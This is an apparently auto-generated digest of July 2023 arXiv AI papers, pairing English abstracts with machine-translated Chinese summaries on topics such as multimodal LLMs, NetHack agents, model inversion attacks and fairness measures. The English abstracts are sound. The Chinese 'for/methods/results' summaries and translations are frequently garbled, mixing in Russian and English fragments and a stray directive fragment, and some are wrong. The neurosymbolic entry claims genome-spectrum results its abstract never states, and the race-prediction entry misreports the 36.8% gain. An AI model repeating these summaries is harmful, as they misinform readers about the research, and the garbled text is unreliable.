LLMs 已经表现出了与人类语言交互的异常出色能力，特别是在使用指令数据时。最新的 LLMs，如 MiniGPT-4、LLaVA 和 X-LLM，进一步扩展了它们的能力，通过包括图像、视频和语音多种输入模式。尽管这些 LLMs 可以生成精准和详细的语言理解输入信号，但它们失去了对特定输入部分的地址映射的能力，因此只能建立粗糙的映射。然而，显式和有用的输入模式与文本之间的对应关系不仅会提高用户体验，还可以扩展多模态 LLMs 的应用场景。因此，我们提出了 BuboGPT，一种具有视觉定位的多模态 LLM，可以在视觉、语音和文本之间进行跨模态交互，提供细化的视觉对象理解和其他输入模式的精准地址映射。因此，BuboGPT 能够在生成响应或描述某个对象时指出该对象在图像中的具体位置。我们的贡献包括：1. 基于 SAM 的Visual Grounding Module，可以从 sentence 中提取实体并在图像中找到匹配的面征。2. 一种两stage 训练方案和指令数据集，以激活joint text-image-audio理解。我们的实验表明，BuboGPT 在与人类交互时表现出了很好的多模态理解和视觉定位能力，能够在不同的模式组合（可能是对齐或不对齐）下表现稳定。我们的代码、模型和数据集可以在获取。

Nonlinear Processing with Linear Optics

paper_url: http://arxiv.org/abs/2307.08533
repo_url: None
paper_authors: Mustafa Yildirim, Niyazi Ulas Dinc, Ilker Oguz, Demetri Psaltis, Christophe Moser
for: 这项研究旨在提高神经网络的能效性和速度，通过利用光学实现多层神经网络，而不需要低功率光学非线性元件。
methods: 该研究提出了一种新的框架，通过多散射实现程序可编程的线性和非线性变换，并且可以在低光力率下实现非线性光学计算。
results: 理论和实验研究显示，通过重复数据的散射可以实现低功率连续波光学计算，并且可以同时实现线性和非线性变换。

Abstract
Deep neural networks have achieved remarkable breakthroughs by leveraging multiple layers of data processing to extract hidden representations, albeit at the cost of large electronic computing power. To enhance energy efficiency and speed, the optical implementation of neural networks aims to harness the advantages of optical bandwidth and the energy efficiency of optical interconnections. In the absence of low-power optical nonlinearities, the challenge in the implementation of multilayer optical networks lies in realizing multiple optical layers without resorting to electronic components. In this study, we present a novel framework that uses multiple scattering that is capable of synthesizing programmable linear and nonlinear transformations concurrently at low optical power by leveraging the nonlinear relationship between the scattering potential, represented by data, and the scattered field. Theoretical and experimental investigations show that repeating the data by multiple scattering enables non-linear optical computing at low power continuous wave light.

摘要
深度神经网络已经取得了非常出色的突破，通过多层数据处理来抽取隐藏表示，尽管在电子计算能力上付出了很大的代价。为了提高能效性和速度，光学实现神经网络尝试利用光学带宽和光学连接的能效性。在没有低功率光学非线性的情况下，实现多层光学网络的挑战在于不使用电子组件来实现多层光学层。在这种研究中，我们提出了一种新的框架，使用多散射来实现可编程的线性和非线性变换，并在低光力短波光下实现多散射。理论和实验研究表明，通过多次散射来重复数据，可以实现低功率连续波光学计算。

LuckyMera: a Modular AI Framework for Building Hybrid NetHack Agents

paper_url: http://arxiv.org/abs/2307.08532
repo_url: https://github.com/pervasive-ai-lab/luckymera
paper_authors: Luigi Quarantiello, Simone Marzeddu, Antonio Guzzi, Vincenzo Lomonaco
for: 这个研究目的是为了开发一个轻松易用、可扩展的人工智能框架，用于玩家在roguelike游戏中实现高水平的游戏表现。
methods: 这个研究使用了NetHack游戏来测试和训练人工智能代理，并提供了一个高阶的游戏策略设计界面。研究人员还使用了 симвоlic和神经网络模块（称为“技能”），以及实验评估和训练神经网络模型的功能。
results: 这个研究显示了一个强大的基准代理，可以在完整的NetHack游戏中实现州际级的表现。此外，研究人员还提供了一个可扩展的框架，可以实现更多的游戏和策略设计。

Abstract
In the last few decades we have witnessed a significant development in Artificial Intelligence (AI) thanks to the availability of a variety of testbeds, mostly based on simulated environments and video games. Among those, roguelike games offer a very good trade-off in terms of complexity of the environment and computational costs, which makes them perfectly suited to test AI agents generalization capabilities. In this work, we present LuckyMera, a flexible, modular, extensible and configurable AI framework built around NetHack, a popular terminal-based, single-player roguelike video game. This library is aimed at simplifying and speeding up the development of AI agents capable of successfully playing the game and offering a high-level interface for designing game strategies. LuckyMera comes with a set of off-the-shelf symbolic and neural modules (called "skills"): these modules can be either hard-coded behaviors, or neural Reinforcement Learning approaches, with the possibility of creating compositional hybrid solutions. Additionally, LuckyMera comes with a set of utility features to save its experiences in the form of trajectories for further analysis and to use them as datasets to train neural modules, with a direct interface to the NetHack Learning Environment and MiniHack. Through an empirical evaluation we validate our skills implementation and propose a strong baseline agent that can reach state-of-the-art performances in the complete NetHack game. LuckyMera is open-source and available at https://github.com/Pervasive-AI-Lab/LuckyMera.

摘要
最近几十年内，人工智能（AI）领域所经历的发展非常 significativeto，主要归功于各种测试环境和游戏的可用性。而roguelike游戏又提供了一个非常好的平衡点，即环境复杂度和计算成本之间的融合，使其成为AI测试agent普遍化能力的最佳选择。在这项工作中，我们提出了LuckyMera框架，这是一个基于NetHackterminal型单player roguelike游戏的flexible、可Module、可Configurable和可扩展的AI框架。该框架旨在简化和加速AI测试agent的开发，并提供高级接口来设计游戏策略。LuckyMera具有内置的符号学和神经网络模块（称为“技能”），这些模块可以是硬编码的行为或神经网络学习方法，同时还可以创建Hybrid解决方案。此外，LuckyMera还提供了一些实用功能，如保存经验的轨迹，用于后续分析和训练神经网络模块，直接与NetHack学习环境和MiniHack进行交互。通过实验证明，我们 validate our skills实现和提出了一个强大的基线代理，可以在完整的NetHack游戏中达到顶尖性能。LuckyMera是开源的，可以在https://github.com/Pervasive-AI-Lab/LuckyMera上获取。

Image Captions are Natural Prompts for Text-to-Image Models

paper_url: http://arxiv.org/abs/2307.08526
repo_url: None
paper_authors: Shiye Lei, Hao Chen, Sen Zhang, Bo Zhao, Dacheng Tao
for: 增强文本生成模型在生成训练数据方面的表现，特别是在面临数据稀缺和隐私泄露问题时。
methods: 提出了一种简单 yet effective的方法，通过使用高级captioning模型对实际图像进行描述，从而生成更有信息和多样化的训练数据。
results: 在ImageNette、ImageNet-100和ImageNet-1K等 dataset上进行了广泛的实验，结果显示，我们的方法可以significantly improve模型在生成训练数据上的表现，即平均提高10%的分类精度。

Abstract
With the rapid development of Artificial Intelligence Generated Content (AIGC), it has become common practice in many learning tasks to train or fine-tune large models on synthetic data due to the data-scarcity and privacy leakage problems. Albeit promising with unlimited data generation, owing to massive and diverse information conveyed in real images, it is challenging for text-to-image generative models to synthesize informative training data with hand-crafted prompts, which usually leads to inferior generalization performance when training downstream models. In this paper, we theoretically analyze the relationship between the training effect of synthetic data and the synthetic data distribution induced by prompts. Then we correspondingly propose a simple yet effective method that prompts text-to-image generative models to synthesize more informative and diverse training data. Specifically, we caption each real image with the advanced captioning model to obtain informative and faithful prompts that extract class-relevant information and clarify the polysemy of class names. The image captions and class names are concatenated to prompt generative models for training image synthesis. Extensive experiments on ImageNette, ImageNet-100, and ImageNet-1K verify that our method significantly improves the performance of models trained on synthetic training data, i.e., 10% classification accuracy improvements on average.

摘要
随着人工智能生成内容（AIGC）的快速发展，在许多学习任务中通常使用合成数据进行训练或细化大型模型，因为实际数据的缺乏和隐私泄露问题。虽然有普遍的可访问性和多样性的实际图像信息，但文本生成模型很难通过手工提示生成有用的训练数据，通常会导致下游模型的训练性能不佳。在这篇论文中，我们 theoretically 分析了印杂数据训练的效果和提示所引起的数据分布关系。然后，我们对应提出了一种简单 yet effective 的方法，使文本生成模型在训练图像生成时生成更有用和多样的数据。具体来说，我们使用进步的描述模型将实际图像描述成 faithful 和有用的提示，提取类相关信息并清晰地表达类名的多义性。图像描述和类名被 concatenate 以提交给生成模型进行训练图像生成。广泛的实验结果表明，我们的方法可以在 ImageNette、ImageNet-100 和 ImageNet-1K 上提高模型在合成训练数据上的性能，即平均提高10%的分类精度。

Does Visual Pretraining Help End-to-End Reasoning?

paper_url: http://arxiv.org/abs/2307.08506
repo_url: None
paper_authors: Chen Sun, Calvin Luo, Xingyi Zhou, Anurag Arnab, Cordelia Schmid
for: investigate whether end-to-end learning of visual reasoning can be achieved with general-purpose neural networks, and challenge the common belief that explicit visual abstraction is essential for compositional generalization on visual reasoning.
methods: propose a simple and general self-supervised framework which “compresses” each video frame into a small set of tokens with a transformer network, and reconstructs the remaining frames based on the compressed temporal context.
results: observe that pretraining is essential to achieve compositional generalization for end-to-end visual reasoning, and our proposed framework outperforms traditional supervised pretraining, including image classification and explicit object detection, by large margins.

Abstract
We aim to investigate whether end-to-end learning of visual reasoning can be achieved with general-purpose neural networks, with the help of visual pretraining. A positive result would refute the common belief that explicit visual abstraction (e.g. object detection) is essential for compositional generalization on visual reasoning, and confirm the feasibility of a neural network "generalist" to solve visual recognition and reasoning tasks. We propose a simple and general self-supervised framework which "compresses" each video frame into a small set of tokens with a transformer network, and reconstructs the remaining frames based on the compressed temporal context. To minimize the reconstruction loss, the network must learn a compact representation for each image, as well as capture temporal dynamics and object permanence from temporal context. We perform evaluation on two visual reasoning benchmarks, CATER and ACRE. We observe that pretraining is essential to achieve compositional generalization for end-to-end visual reasoning. Our proposed framework outperforms traditional supervised pretraining, including image classification and explicit object detection, by large margins.

摘要
我们的目标是研究是否可以使用通用神经网络来学习视觉逻辑，并且通过视觉预处理来帮助。如果得到正面的结果，那么这将证明通过显式的视觉抽象（例如物体检测）不是必需的，并且确认神经网络"通用"可以解决视觉识别和逻辑任务。我们提出了一个简单和通用的自我超vised框架，使得每帧视频都可以被压缩成一小组token，并使用变换器网络重建剩下的帧。为了减少重建损失，网络必须学习每幅图像的紧凑表示，同时捕捉时间上下文中的动态和物体的永久性。我们在CATER和ACRE两个视觉逻辑benchmark上进行评估，发现预处理是必要的，以实现结构化总结。我们的提议的框架在超过传统的直接监督预处理，包括图像分类和显式物体检测，的情况下表现出大的优势。

Can We Trust Race Prediction?

paper_url: http://arxiv.org/abs/2307.08496
repo_url: https://github.com/cangyuanli/pyethnicity
paper_authors: Cangyuan Li
for: 本研究的目的是提高选民登记数据中的预测性能，并构建美国各州选民登记数据的全面数据库。
methods: 本研究使用bidirectional LSTM模型，并将其组合成ensemble模型，可以达到Literature中最高的36.8%的OOS F1分数。
results: 本研究构建了美国各州选民登记数据的最全面的数据库，并提供了高质量的比较基准数据集，以帮助未来的模型开发者。

Abstract
In the absence of sensitive race and ethnicity data, researchers, regulators, and firms alike turn to proxies. In this paper, I train a Bidirectional Long Short-Term Memory (BiLSTM) model on a novel dataset of voter registration data from all 50 US states and create an ensemble that achieves up to 36.8% higher out of sample (OOS) F1 scores than the best performing machine learning models in the literature. Additionally, I construct the most comprehensive database of first and surname distributions in the US in order to improve the coverage and accuracy of Bayesian Improved Surname Geocoding (BISG) and Bayesian Improved Firstname Surname Geocoding (BIFSG). Finally, I provide the first high-quality benchmark dataset in order to fairly compare existing models and aid future model developers.

摘要
在敏感的种族和民族数据缺失的情况下，研究人员、规则制定者和企业都会倾向于使用代理。在这篇论文中，我使用bidirectional long short-term memory（BiLSTM）模型训练了一个新的选民注册数据集，并创建了一个 ensemble，其在外测（OOS） F1 分数上达到了36.8%的提高。此外，我还构建了美国首次和姓氏分布的最全面的数据库，以提高 Bayesian Improved Surname Geocoding（BISG）和 Bayesian Improved Firstname Surname Geocoding（BIFSG）的覆盖率和准确率。最后，我提供了首个高质量的 referential dataset，以公平地比较现有模型并帮助未来的模型开发者。

Navigating Fairness Measures and Trade-Offs

paper_url: http://arxiv.org/abs/2307.08484
repo_url: None
paper_authors: Stefan Buijsman
for: 本研究旨在为AI系统中的偏见监测和预防提供一个基础。
methods: 本研究使用Rawls的正义为公平性提供了一个基础，以帮助决策公平性指标和准确率之间的贸易OFF。
results: 研究发现，使用Rawls的正义来导航公平性指标和准确率之间的贸易OFF，可以创造一个基于理论的决策方法，帮助关注最抢夺的群体和对该群体产生最大影响的公平性指标。

Abstract
In order to monitor and prevent bias in AI systems we can use a wide range of (statistical) fairness measures. However, it is mathematically impossible to optimize for all of these measures at the same time. In addition, optimizing a fairness measure often greatly reduces the accuracy of the system (Kozodoi et al, 2022). As a result, we need a substantive theory that informs us how to make these decisions and for what reasons. I show that by using Rawls' notion of justice as fairness, we can create a basis for navigating fairness measures and the accuracy trade-off. In particular, this leads to a principled choice focusing on both the most vulnerable groups and the type of fairness measure that has the biggest impact on that group. This also helps to close part of the gap between philosophical accounts of distributive justice and the fairness literature that has been observed (Kuppler et al, 2021) and to operationalise the value of fairness.

摘要
要监测和预防人工智能系统中的偏见，我们可以使用一系列（统计）公平度量。然而，从数学角度来看，同时优化所有这些公平度量是不可能的。此外，优化公平度量通常会很大减少系统的准确率（Kozodoi等，2022）。因此，我们需要一种有产物的理论，以帮助我们做出这些决策，并且为什么做出这些决策。我显示，通过使用罗尔斯的公平度量观，我们可以创建一个基于公平度量和准确率之间的平衡的基础。特别是，这会导致一种原则性的选择，集中于最容易受到影响的群体和对该群体有最大影响的公平度量。这也有助于将哲学财富分配正义和公平文献之间的差距降低（Kuppler等，2021），并将公平的价值实践化。

Derivation-Graph-Based Characterizations of Decidable Existential Rule Sets

paper_url: http://arxiv.org/abs/2307.08481
repo_url: None
paper_authors: Tim S. Lyon, Sebastian Rudolph
for: 这篇论文目的是为了建立表达力强的类型规则集的代表性定义。
methods: 论文使用了 derivation graph 的概念和证明论证来研究存在规则的分析逻辑。
results: 论文得到了 gbts 和 cdgs 之间的等价关系，以及 wgbts 和 wcdgs 之间的等价关系。这些结果将有助于深化我们对存在规则的分析逻辑的理解。

Abstract
This paper establishes alternative characterizations of very expressive classes of existential rule sets with decidable query entailment. We consider the notable class of greedy bounded-treewidth sets (gbts) and a new, generalized variant, called weakly gbts (wgbts). Revisiting and building on the notion of derivation graphs, we define (weakly) cycle-free derivation graph sets ((w)cdgs) and employ elaborate proof-theoretic arguments to obtain that gbts and cdgs coincide, as do wgbts and wcdgs. These novel characterizations advance our analytic proof-theoretic understanding of existential rules and will likely be instrumental in practice.

摘要

Clarifying the Half Full or Half Empty Question: Multimodal Container Classification

paper_url: http://arxiv.org/abs/2307.08471
repo_url: None
paper_authors: Josua Spisak, Matthias Kerzel, Stefan Wermter
for: 这篇论文主要是为了研究多模态融合的问题，以提高机器人的感知能力。
methods: 本论文使用了不同的融合策略，将视觉、感觉和自带感知数据融合在一起，以便在分类容器和其内容时使用多模态信息。
results: 研究发现，使用多模态融合策略可以提高分类精度，比使用单一感知信息高出15%。

Abstract
Multimodal integration is a key component of allowing robots to perceive the world. Multimodality comes with multiple challenges that have to be considered, such as how to integrate and fuse the data. In this paper, we compare different possibilities of fusing visual, tactile and proprioceptive data. The data is directly recorded on the NICOL robot in an experimental setup in which the robot has to classify containers and their content. Due to the different nature of the containers, the use of the modalities can wildly differ between the classes. We demonstrate the superiority of multimodal solutions in this use case and evaluate three fusion strategies that integrate the data at different time steps. We find that the accuracy of the best fusion strategy is 15% higher than the best strategy using only one singular sense.

摘要
设置为简化中文。<>多modal integration 是让机器人感知世界的关键组件。多modal 存在多种挑战，如如何集成和融合数据。本文比较了不同的融合视觉、感觉和 proprioceptive 数据的可能性。数据直接记录在 NICOL 机器人上，在一个实验室中，机器人需要分类容器和其内容。由于容器的不同性，使用不同的感知方式可以在类别中有很大差异。我们示出了多modal 解决方案在这种用例中的优越性，并评估了三种融合策略，在不同的时间步骤上集成数据。我们发现，使用多modal 策略的最佳准确率比使用单一感知方式最佳策略高出了15%。

Towards eXplainable AI for Mobility Data Science

paper_url: http://arxiv.org/abs/2307.08461
repo_url: None
paper_authors: Anahid Jalali, Anita Graser, Clemens Heistracher
for: 本研究目的是为了实现行动数据科学应用中的可解释性模型，即可以从稠密轨迹数据，如汽车和船用的GPS轨迹数据中学习的模型，并提供可理解的解释。
methods: 本研究使用了时间图 neural networks (GNNs)和 counterfactuals 来实现可解释的模型，并评估了这些方法在不同的数据集上的性能。
results: 本研究提出了一种研究路径，以便实现行动数据科学中的可解释性模型，并评估了现有的 GeoXAI 研究，认为需要更加人类中心的解释方法。

Abstract
This paper presents our ongoing work towards XAI for Mobility Data Science applications, focusing on explainable models that can learn from dense trajectory data, such as GPS tracks of vehicles and vessels using temporal graph neural networks (GNNs) and counterfactuals. We review the existing GeoXAI studies, argue the need for comprehensible explanations with human-centered approaches, and outline a research path toward XAI for Mobility Data Science.

摘要

Long-range Dependency based Multi-Layer Perceptron for Heterogeneous Information Networks

paper_url: http://arxiv.org/abs/2307.08430
repo_url: https://github.com/jhl-hust/ldmlp
paper_authors: Chao Li, Zijie Guo, Qiuting He, Hao Xu, Kun He
for: 这篇论文旨在解决现有的多型 graphs neuronal networks (HGNNs) 中的长距离依赖性 utilization 问题，以提高 HGNNs 的性能和效率。
methods: 本文提出了一种 Long-range Dependency based Multi-Layer Perceptron (LDMLP)，通过自动找到有效的meta-paths来解决高 computation 和 memory 成本问题。LDMLP 还利用了一个简单的架构，将 multi-layer perceptions 用于搜寻阶段，以提高搜寻结果的一致性。
results: 实验结果显示，LDMLP 可以在八个多型 graphs 数据集上取得 state-of-the-art 的性能，同时具有高效率和一致性，特别是在罕见 HINs 上。此外，LDMLP 还可以提高其他 HGNNs 的性能，如 HAN 和 SeHGNN。

Abstract
Existing heterogeneous graph neural networks (HGNNs) have achieved great success in utilizing the rich semantic information in heterogeneous information networks (HINs). However, few works have delved into the utilization of long-range dependencies in HINs, which is extremely valuable as many real-world HINs are sparse, and each node has only a few directly connected neighbors. Although some HGNNs can utilize distant neighbors by stacking multiple layers or leveraging long meta-paths, the exponentially increased number of nodes in the receptive field or the number of meta-paths incurs high computation and memory costs. To address these issues, we investigate the importance of different meta-paths and propose Long-range Dependency based Multi-Layer Perceptron (LDMLP). Specifically, to solve the high-cost problem of leveraging long-range dependencies, LDMLP adopts a search stage to discover effective meta-paths automatically, reducing the exponentially increased number of meta-paths to a constant. To avoid the influence of specific modules on search results, LDMLP utilizes a simple architecture with only multi-layer perceptions in the search stage, improving the generalization of searched meta-paths. As a result, the searched meta-paths not only perform well in LDMLP but also enable other HGNNs like HAN and SeHGNN to perform better. Extensive experiments on eight heterogeneous datasets demonstrate that LDMLP achieves state-of-the-art performance while enjoying high efficiency and generalization, especially on sparse HINs.

摘要
现有的异种图 neural network (HGNN) 已经在异种信息网络 (HIN) 中获得了很大的成功，但是很少的研究者在 HIN 中利用长距离依赖关系，这对于许多实际世界 HIN 来说是非常有价值的，因为每个节点通常只有几个直接连接的邻居。虽然一些 HGNN 可以利用远程邻居，但是通过堆叠多层或利用长媒体路径来实现，导致计算和存储成本随着节点数量的增加而呈指数增长。为解决这些问题，我们调查不同的媒体路径的重要性并提出了 Long-range Dependency based Multi-Layer Perceptron (LDMLP)。具体来说，为解决长距离依赖关系的高计算成本问题，LDMLP 采用了搜索阶段自动发现有效的媒体路径，从而将 exponentially 增加的节点数量降低到常数。此外，为确保搜索结果不受特定模块的影响，LDMLP 使用了简单的架构，只有多层感知，从而提高了搜索的通用性。因此，搜索到的媒体路径不仅在 LDMLP 中表现良好，还可以使得其他 HGNN 如 HAN 和 SeHGNN 表现更好。我们在八个异种数据集进行了广泛的实验，结果表明，LDMLP 可以 дости得状态 искусственный智能性的表现，同时具有高效性和通用性，特别是在稀有 HIN 上。

Unstoppable Attack: Label-Only Model Inversion via Conditional Diffusion Model

paper_url: http://arxiv.org/abs/2307.08424
repo_url: None
paper_authors: Rongke Liu
for:The paper is written to address the issue of model inversion attacks (MIAs) in deep learning models, specifically in black-box scenarios where the attacker does not have access to the model’s parameters.methods:The paper proposes a novel method of MIA using a conditional diffusion model to recover the precise sample of the target without any extra optimization. The method uses two primary techniques: selecting an auxiliary dataset that is relevant to the target model task, and using the target labels and random standard normally distributed noise as conditions to guide the training process.results:The paper demonstrates that the proposed method can generate similar and accurate data to the target without optimization and outperforms generators of previous approaches in the label-only scenario. The method is evaluated using Learned Perceptual Image Patch Similarity (LPIPS) as one of the evaluation metrics, and the results show that the method achieves high attack accuracy, realism, and similarity.

Abstract
Model inversion attacks (MIAs) are aimed at recovering private data from a target model's training set, which poses a threat to the privacy of deep learning models. MIAs primarily focus on the white-box scenario where the attacker has full access to the structure and parameters of the target model. However, practical applications are black-box, it is not easy for adversaries to obtain model-related parameters, and various models only output predicted labels. Existing black-box MIAs primarily focused on designing the optimization strategy, and the generative model is only migrated from the GAN used in white-box MIA. Our research is the pioneering study of feasible attack models in label-only black-box scenarios, to the best of our knowledge. In this paper, we develop a novel method of MIA using the conditional diffusion model to recover the precise sample of the target without any extra optimization, as long as the target model outputs the label. Two primary techniques are introduced to execute the attack. Firstly, select an auxiliary dataset that is relevant to the target model task, and the labels predicted by the target model are used as conditions to guide the training process. Secondly, target labels and random standard normally distributed noise are input into the trained conditional diffusion model, generating target samples with pre-defined guidance strength. We then filter out the most robust and representative samples. Furthermore, we propose for the first time to use Learned Perceptual Image Patch Similarity (LPIPS) as one of the evaluation metrics for MIA, with systematic quantitative and qualitative evaluation in terms of attack accuracy, realism, and similarity. Experimental results show that this method can generate similar and accurate data to the target without optimization and outperforms generators of previous approaches in the label-only scenario.

摘要
模型反推攻击（MIA）是target模型的训练集中私人数据的恢复，这种攻击对深度学习模型的隐私造成了威胁。MIA主要在白盒enario中进行，攻击者可以完全访问目标模型的结构和参数。然而，在实际应用中，敌方通常无法获得模型相关的参数，只有输出预测标签。现有的黑盒MIA主要关注于设计优化策略，而模型migrated from GAN在白盒MIA中使用。我们的研究是黑盒MIA的开拓性研究，到我们所知道的范围内是首次。在这篇论文中，我们开发了一种使用conditional diffusion模型来恢复target模型的准确样本，不需要任何额外优化。只要target模型输出标签，我们就可以通过以下两种技术来执行攻击。首先，选择一个相关的auxiliary dataset，并使用目标模型预测的标签作为准则来导引训练过程。其次，通过对已经训练的conditional diffusion模型中的标签和随机标准差分布噪声输入，生成具有预定的导向强度的目标样本。然后，我们将过滤出最Robust和代表性最高的样本。此外，我们还提出了在MIA中使用Learned Perceptual Image Patch Similarity（LPIPS）作为评价指标，并进行系统atic quantitative和质量评价，包括攻击准确率、真实性和相似性。实验结果表明，这种方法可以生成与目标模型无需优化的准确和真实的数据，并且在黑盒scenario中超越了前一代方法的生成器。

Systematic Comparison of Software Agents and Digital Twins: Differences, Similarities, and Synergies in Industrial Production

paper_url: http://arxiv.org/abs/2307.08421
repo_url: None
paper_authors: Lasse Matthias Reinpold, Lukas Peter Wagner, Felix Gehlhoff, Malte Ramonat, Maximilian Kilthau, Milapji Singh Gill, Jonathan Tobias Reif, Vincent Henkel, Lena Scholz, Alexander Fay
for:This paper compares and contrasts the use of Software Agents (Agents) and Digital Twins (DTs) in industrial applications, with the goal of determining their differences, similarities, and potential synergies.methods:The comparison is based on the purposes for which Agents and DTs are applied, their properties and capabilities, and how they can be allocated within the Reference Architecture Model Industry 4.0.results:The study finds that Agents are commonly employed in the collaborative planning and execution of production processes, while DTs typically play a more passive role in monitoring production resources and processing information. The analysis suggests that a combination of Agents and DTs would demonstrate high degrees of intelligence, autonomy, sociability, and fidelity, but further standardization is required, particularly in the field of DTs.

Abstract
To achieve a highly agile and flexible production, it is envisioned that industrial production systems gradually become more decentralized, interconnected, and intelligent. Within this vision, production assets collaborate with each other, exhibiting a high degree of autonomy. Furthermore, knowledge about individual production assets is readily available throughout their entire life-cycles. To realize this vision, adequate use of information technology is required. Two commonly applied software paradigms in this context are Software Agents (referred to as Agents) and Digital Twins (DTs). This work presents a systematic comparison of Agents and DTs in industrial applications. The goal of the study is to determine the differences, similarities, and potential synergies between the two paradigms. The comparison is based on the purposes for which Agents and DTs are applied, the properties and capabilities exhibited by these software paradigms, and how they can be allocated within the Reference Architecture Model Industry 4.0. The comparison reveals that Agents are commonly employed in the collaborative planning and execution of production processes, while DTs typically play a more passive role in monitoring production resources and processing information. Although these observations imply characteristic sets of capabilities and properties for both Agents and DTs, a clear and definitive distinction between the two paradigms cannot be made. Instead, the analysis indicates that production assets utilizing a combination of Agents and DTs would demonstrate high degrees of intelligence, autonomy, sociability, and fidelity. To achieve this, further standardization is required, particularly in the field of DTs.

摘要
The comparison reveals that Agents are commonly employed in the collaborative planning and execution of production processes, while DTs typically play a more passive role in monitoring production resources and processing information. Although these observations imply characteristic sets of capabilities and properties for both Agents and DTs, a clear and definitive distinction between the two paradigms cannot be made. Instead, the analysis indicates that production assets utilizing a combination of Agents and DTs would demonstrate high degrees of intelligence, autonomy, sociability, and fidelity. To achieve this, further standardization is required, particularly in the field of DTs.

Neurosymbolic AI for Reasoning on Biomedical Knowledge Graphs

paper_url: http://arxiv.org/abs/2307.08411
repo_url: None
paper_authors: Lauren Nicole DeLong, Ramon Fernández Mir, Zonglin Ji, Fiona Niamh Coulter Smith, Jacques D. Fleuriot
for: 这种论文是为了探讨基因组谱的完成问题，以及如何使用符号智能技术来解决这个问题。
methods: 这种论文使用了一种混合的符号智能技术，包括规则基本实体、嵌入式实体和逻辑回归等方法，以解决基因组谱的完成问题。
results: 这种论文的研究结果表明，使用符号智能技术可以提高基因组谱的完成率和准确率，并且可以更好地捕捉基因组谱中的复杂关系和特征。

Abstract
Biomedical datasets are often modeled as knowledge graphs (KGs) because they capture the multi-relational, heterogeneous, and dynamic natures of biomedical systems. KG completion (KGC), can, therefore, help researchers make predictions to inform tasks like drug repositioning. While previous approaches for KGC were either rule-based or embedding-based, hybrid approaches based on neurosymbolic artificial intelligence are becoming more popular. Many of these methods possess unique characteristics which make them even better suited toward biomedical challenges. Here, we survey such approaches with an emphasis on their utilities and prospective benefits for biomedicine.

摘要

A Novel Multiagent Flexibility Aggregation Framework

paper_url: http://arxiv.org/abs/2307.08401
repo_url: None
paper_authors: Stavros Orfanoudakis, Georgios Chalkiadakis
for: 提高Distributed Energy Resources（DERs）在智能电网中的有效利用，建立一种智能多代理框架来管理DERs。
methods: 提出了一种新的DER聚合框架，包括多代理体系和不同类型的机制来有效地 инте integrating DERs into the Grid。
results: 实验表明，该框架可以有效地将各种不同的DERs集成到Grid中，并且可以提高参与者的平均支付。使用CRPS分数规则选择机制可以提高参与者的预测准确率。

Abstract
The increasing number of Distributed Energy Resources (DERs) in the emerging Smart Grid, has created an imminent need for intelligent multiagent frameworks able to utilize these assets efficiently. In this paper, we propose a novel DER aggregation framework, encompassing a multiagent architecture and various types of mechanisms for the effective management and efficient integration of DERs in the Grid. One critical component of our architecture is the Local Flexibility Estimators (LFEs) agents, which are key for offloading the Aggregator from serious or resource-intensive responsibilities -- such as addressing privacy concerns and predicting the accuracy of DER statements regarding their offered demand response services. The proposed framework allows the formation of efficient LFE cooperatives. To this end, we developed and deployed a variety of cooperative member selection mechanisms, including (a) scoring rules, and (b) (deep) reinforcement learning. We use data from the well-known PowerTAC simulator to systematically evaluate our framework. Our experiments verify its effectiveness for incorporating heterogeneous DERs into the Grid in an efficient manner. In particular, when using the well-known probabilistic prediction accuracy-incentivizing CRPS scoring rule as a selection mechanism, our framework results in increased average payments for participants, when compared with traditional commercial aggregators.

摘要
随着分布式能源资源（DERs）在智能电网中的增加，需要有效地利用这些资源已成为一项紧迫的需求。本文提出了一种新的DER集成框架，包括多智能体架构和不同类型的机制，以便有效管理和有效地吸收DERs在电网中。本文中的一个关键组件是地方flexibility估计（LFEs）代理，它们可以减轻集成器的负担，例如处理隐私问题和预测DERs提供的需求回应服务的准确性。我们的框架允许形成高效的LFE合作社。为此，我们开发了和部署了多种合作社员选择机制，包括（a）分数规则，以及（b）深度鼓励学习。我们使用PowerTAC simulator中的数据进行系统性评估我们的框架。我们的实验表明，当使用CRPS分数规则作为选择机制时，我们的框架可以有效地吸收不同类型的DERs。

Gender mobility in the labor market with skills-based matching models

paper_url: http://arxiv.org/abs/2307.08368
repo_url: None
paper_authors: Ajaya Adhikari, Steven Vethman, Daan Vos, Marc Lenz, Ioana Cocu, Ioannis Tolios, Cor J. Veenman
for: 本研究旨在探讨基于技能匹配的劳动市场流动性是否会促进性别分布的调整。
methods: 研究使用了语言模型和监督学习方法，包括bag of words、word2vec和BERT语言表示，以及不同的距离度量（静止和机器学习基于的）。
results: 研究发现，基于技能匹配的模型会传递性别分布偏见，而不同的语言表示和距离度量可能会影响模型的匹配性和风险。

Abstract
Skills-based matching promises mobility of workers between different sectors and occupations in the labor market. In this case, job seekers can look for jobs they do not yet have experience in, but for which they do have relevant skills. Currently, there are multiple occupations with a skewed gender distribution. For skills-based matching, it is unclear if and how a shift in the gender distribution, which we call gender mobility, between occupations will be effected. It is expected that the skills-based matching approach will likely be data-driven, including computational language models and supervised learning methods. This work, first, shows the presence of gender segregation in language model-based skills representation of occupations. Second, we assess the use of these representations in a potential application based on simulated data, and show that the gender segregation is propagated by various data-driven skills-based matching models.These models are based on different language representations (bag of words, word2vec, and BERT), and distance metrics (static and machine learning-based). Accordingly, we show how skills-based matching approaches can be evaluated and compared on matching performance as well as on the risk of gender segregation. Making the gender segregation bias of models more explicit can help in generating healthy trust in the use of these models in practice.

摘要
<>使用技能匹配的承诺，工作者可以在劳动市场中移动 между不同的领域和职业。在这种情况下，招聘人员可以寻找他们没有经验的工作，但具有相关技能。目前，有多个职业存在倾斜性的性别分布。对于技能匹配方法，不确定性是 gender mobilty 会如何改变。预计技能匹配方法将会是数据驱动的，包括计算机语言模型和监督学习方法。这项工作首先显示了语言模型基于职业技能表示中的性别分布。其次，我们评估了这些表示在基于验证数据的应用中的使用，并显示了这些模型在各种数据驱动技能匹配模型中的性别分布倾斜。这些模型基于不同的语言表示（袋式、word2vec和BERT）和距离度量（静止和机器学习基于）。因此，我们可以评估和比较技能匹配方法的匹配性和性别分布倾斜。使得模型中的性别分布倾斜更加明确，可以帮助在实践中健康地信任这些模型。>>

M-FLAG: Medical Vision-Language Pre-training with Frozen Language Models and Latent Space Geometry Optimization

paper_url: http://arxiv.org/abs/2307.08347
repo_url: https://github.com/cheliu-computation/m-flag-miccai2023
paper_authors: Che Liu, Sibo Cheng, Chen Chen, Mengyun Qiao, Weitong Zhang, Anand Shah, Wenjia Bai, Rossella Arcucci
for: 这篇论文旨在提出一种新的医疗影像语言模型预训方法，以提高医疗影像和临床文本之间的联合学习。
